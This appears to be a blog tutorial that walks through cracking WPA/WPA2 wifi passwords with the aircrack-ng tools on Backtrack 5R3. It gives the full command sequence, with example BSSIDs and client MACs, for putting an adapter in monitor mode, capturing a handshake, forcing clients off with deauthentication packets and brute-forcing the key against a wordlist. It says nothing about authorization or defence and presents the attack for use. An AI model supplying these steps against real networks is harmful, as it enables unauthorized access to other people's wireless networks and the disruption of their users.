EARN FREE BITCOIN

Hacking Wifi WPA2 Backtrack 5R3

Assalam-o-Alikum to all of you!
This lecture is about wpa\wpa2 cracking.
Requirements for WPA\wpa2 cracking:
1= Backtrack 5r3
2= WiFi device 
3= world-list file 

The commands which we will need in wpa\wpa2 cracking are as under:

1= Airmon-ng
2= Airmon-ng start wlan0
3= Airodump-ng mon0
4= Airodump-ng -c ( channel ) -w ( file name to rite captured packets ) --bssid (bssid of network) mon0
5= Aireplay-ng --deauth 1 -a (bssid) mon0
6= Aircrack-ng (file name) -w( drag worldlist file )

Process . . . .

1= * Open terminal and type first command:
Airmon-ng :
This command will shows the interfaces status. You need to change the status from managed mode to monitor mode. (As shown)
[Image: 1st_command.png]

2= * Now type second command :
Airmon-ng start wlan0 :
This command enables monitor mode on the wireless interface. (As shown)
[Image: 2nd_command.png]

3= * Now type third command:
Airodump-ng mon0 :
This command will scane all networks. (AS shown)
[Image: 3rd_command.png]

4=* Now type foruth command:
Airodump-ng -c ( channel ) -w ( file name to save captured packets ) --bssid (bssid of network) mon0 :
This cammand will scane a single network and you must have to wate untill you get handshake file .For our example, it would look like:
airodump-ng –w capture-packages –bssid 00:22:75:E7:6E:0B –c 11 mon0 (As Shown)
[Image: 4th_command.png]

5= * Now type fifth command :
Aireplay-ng --deauth 64 -a (bssid) mon0 :
This command will send deauth request if the data is not generating you can also increse the number of deauth requests.for our example, it would look like:
aireplay-ng --deauth 1 –a 00:22:75:E7:6E:0B –c F0:CB:A1:2A:FB:62 mon0. (As shown)
[Image: 5th_command.png]

6= * Now type sixth command : NOTE: World-list should be in "/ROOT/PEN TEST/PASSWORDS/WORLD-LIST/"
Aircrack-ng (file name) -w( drag world-list file ) :
This command will crack the password. (As Shown) :lol: 
[Image: 6th_command.png] 

Hope all of you get it. If any problem ask me ( Must Reply ) & if there is any mistake you can tell me I'll correct it.

Newer Post Older Post

Leave a Reply